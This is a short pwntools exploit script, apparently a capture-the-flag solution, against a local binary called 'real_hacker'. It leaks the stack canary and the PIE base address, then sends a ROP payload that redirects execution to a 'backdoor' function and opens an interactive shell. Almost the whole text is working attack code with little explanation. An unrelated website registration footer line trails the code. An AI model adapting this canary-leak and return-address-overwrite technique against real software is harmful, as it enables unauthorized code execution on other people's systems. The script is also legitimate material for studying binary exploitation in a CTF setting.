from pwn import *
context.binary = './real_hacker'
elf = ELF('./real_hacker')
p = process('./real_hacker')
# calculate address and find gadget needed for alignment
p.recvuntil(b'address -> ')
main_addr = int(p.recvline().strip(), 16)
base_addr = main_addr - elf.symbols['main']
backdoor_addr = base_addr + elf.symbols['backdoor']
rop = ROP(elf)
ret = rop.find_gadget(['ret'])[0] + base_addr
# leak canary
p.sendlineafter(b'name: ', b'a' * 40)
output = p.recvuntil(b'message: ')
canary = u64(b'\x00' + output[output.index(b'Hello, ')+48:][0:7])
p.sendline(b'-1')
payload = flat([
b'A' * 72,
canary,
0,
ret,
backdoor_addr
])
p.sendafter(b'message: ', payload)
p.interactive()
浙公网安备 33010602011771号